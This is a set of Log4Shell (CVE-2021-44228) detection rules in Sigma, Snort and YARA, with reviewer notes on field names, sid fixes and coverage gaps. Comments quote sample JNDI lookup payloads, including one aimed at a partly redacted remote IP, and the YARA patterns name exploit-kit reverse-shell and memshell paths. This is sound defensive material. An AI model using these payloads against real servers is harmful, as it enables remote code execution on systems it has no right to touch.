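SIGMA (SOC Prime)
# NOTE(review): Sigma 'logsource.category' normally carries a single value; if the target
# backend does not accept "webserver, proxy" as written, split this into one rule per category.
# NOTE(review): every selection below requires the literal substring 'jndi'. The referenced
# Cloudflare mitigation post describes lookup-nesting variants that avoid that literal, so treat
# this rule as a first-pass signal and pair it with the Snort and YARA content further down.
# 'post-body' is not a field name confirmed in the standard Sigma webserver/proxy taxonomy --
# verify it against the backend's field mapping before relying on the body selections.
title: Log4j RCE [CVE-2021-44228] Exploitation Detection Patterns (via webserver)
status: experimental
description: Detects possible Log4j exploitation patterns in the user agent header, request URI or POST body on webserver or proxy logs.
author: SOC Prime Team
tags:
    - attack.initial_access
    - attack.t1190
references:
    - https://www.randori.com/blog/cve-2021-44228/
    - https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
    - https://www-cnblogs-com.translate.goog/yyhuni/p/15088134.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://www.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://github.com/apache/logging-log4j2/pull/608
    - https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability
    - https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
    - https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell
    - https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
    - https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
    - https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
logsource:
    category: webserver, proxy
detection:
    # Each pair below is ANDed in the condition: the 'jndi' base match plus one of the
    # scheme/obfuscation tokens. 'ldaps' is subsumed by 'ldap' under |contains and is kept
    # only for readability.
    selection_base_ua:
        c-useragent|contains:
            - 'jndi' #real attack example: ${jndi:ldap://45.XXX.205.XXX:12344/Basic/Command/Base64/XXX==}
    selection_vars_ua:
        c-useragent|contains:
            - 'ldap'
            - 'rmi'
            - 'ldaps'
            - 'dns'
            - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
            - 'upper'
    selection_base_url:
        #https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
        c-uri|contains:
            - 'jndi'
    selection_vars_url:
        c-uri|contains:
            - 'ldap'
            - 'rmi'
            - 'ldaps'
            - 'dns'
            - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
            - 'upper'
    selection_base_body:
        #https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
        post-body|contains:
            - 'jndi'
    selection_vars_body:
        post-body|contains:
            - 'ldap'
            - 'rmi'
            - 'ldaps'
            - 'dns'
            - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
            - 'upper'
    condition: (selection_base_ua and selection_vars_ua) or (selection_base_url and selection_vars_url) or (selection_base_body and selection_vars_body)
falsepositives:
    - Unknown
level: high

SNORT:
# NOTE(review): the listing as published reused sid 2034647, 2034650 and 2034652 for three rules
# each (the ldap/rmi originals plus the dns and ldaps variants). Duplicate sids are rejected or
# silently collapsed at rule load, so every rule below now carries a unique sid. The six dns/ldaps
# rules use CONSTRUCTED placeholder sids from the local range (>=1000000); replace them with the
# upstream ET sids for those variants before deployment.
# NOTE(review): the "(http dns)" and "(http ldaps)" rules were declared 'alert tcp', which made
# them byte-identical duplicates of the tcp variants; they now use the http protocol keyword like
# "(http ldap)" and "(http rmi)".
# Coverage caveat: all content matches are the literal '${jndi:<scheme>://' form (nocase); the
# obfuscated variants shown in the Sigma comments above are not covered by these rules.
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
# sid placeholders (CONSTRUCTED, local range) start here
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:1000001; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:1000002; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:1000003; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:1000004; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:1000005; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:1000006; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)

YARA (https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar):
rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 {
   meta:
      description = "Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8"
      date = "2021-12-12"
      score = 60
   strings:
      // Callback scheme://host:port/path shapes taken from the referenced incident IOC list.
      // '[aZ]' in the last group is a one-character class (literal 'a' or 'Z'), not the range a-Z.
      $xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
   condition:
      1 of them
}
rule EXPL_JNDI_Exploit_Patterns_Dec21_1 {
   meta:
      description = "Detects JNDI Exploit Kit patterns in files"
      author = "Florian Roth"
      reference =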
"https://github.com/pimps/JNDI-Exploit-Kit" date = "2021-12-12" score = 60 strings: $x01 = "/Basic/Command/Base64/" $x02 = "/Basic/ReverseShell/" $x03 = "/Basic/TomcatMemshell" $x04 = "/Basic/JettyMemshell" $x05 = "/Basic/WeblogicMemshell" $x06 = "/Basic/JBossMemshell" $x07 = "/Basic/WebsphereMemshell" $x08 = "/Basic/SpringMemshell" $x09 = "/Deserialization/URLDNS/" $x10 = "/Deserialization/CommonsCollections1/Dnslog/" $x11 = "/Deserialization/CommonsCollections2/Command/Base64/" $x12 = "/Deserialization/CommonsBeanutils1/ReverseShell/" $x13 = "/Deserialization/Jre8u20/TomcatMemshell" $x14 = "/TomcatBypass/Dnslog/" $x15 = "/TomcatBypass/Command/" $x16 = "/TomcatBypass/ReverseShell/" $x17 = "/TomcatBypass/TomcatMemshell" $x18 = "/TomcatBypass/SpringMemshell" $x19 = "/GroovyBypass/Command/" $x20 = "/WebsphereBypass/Upload/" $fp1 = "